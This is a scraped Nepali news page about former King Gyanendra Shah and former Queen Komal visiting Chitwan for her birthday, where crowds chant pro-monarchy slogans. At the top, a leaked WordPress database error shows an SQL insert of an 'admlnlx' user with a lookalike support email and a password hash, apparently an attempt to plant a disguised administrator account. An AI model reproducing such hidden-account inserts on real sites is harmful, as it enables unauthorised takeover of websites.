WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1Ihp8myEa7fGa9hDBoCd74oF.XDL7/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 08:58:09', '', 'admlnlx', 'admlnlx')
चितवन, फागुन ६–
पूर्व राजा ज्ञानेन्द्र शाह रानी कोमलसंगै चितवन आउनु भएको छ । पूर्व रानी कोमलको जन्मोत्सव मनाउन पूर्व राजपरिवार आज चितवन आउनुभएको हो । उहाँहरु आज मेघौलीको बाराही जंगल रिसोर्टमा बस्नुहुनेछ ।
आज दिउँसो बा ४ च ३८०७ नम्बरको ल्याण्ड क्लुजर गाडी मार्फत पूर्वराज परिवार चितवन आउनुभएको हो । पूर्व राजा ज्ञानेन्द्र आफै गाडी चलाउनुभएको थियो । भरतपुरस्थित भरतपुर गार्डेन रिसोर्टमा विहानी खानापछि उहाँ मेघौली प्रस्थान गर्नुभएको छ । उहाँहरुको स्वागतमा आज भरतपुरको चौविसकोठीमा ठूलो भिड लागेको थियो । उनीहरुले राज आउँ देश बचाउँ भन्दै नारा लगाएका थिए ।
https://www.youtube.com/watch?v=LERtwrPgU_8&feature=youtu.be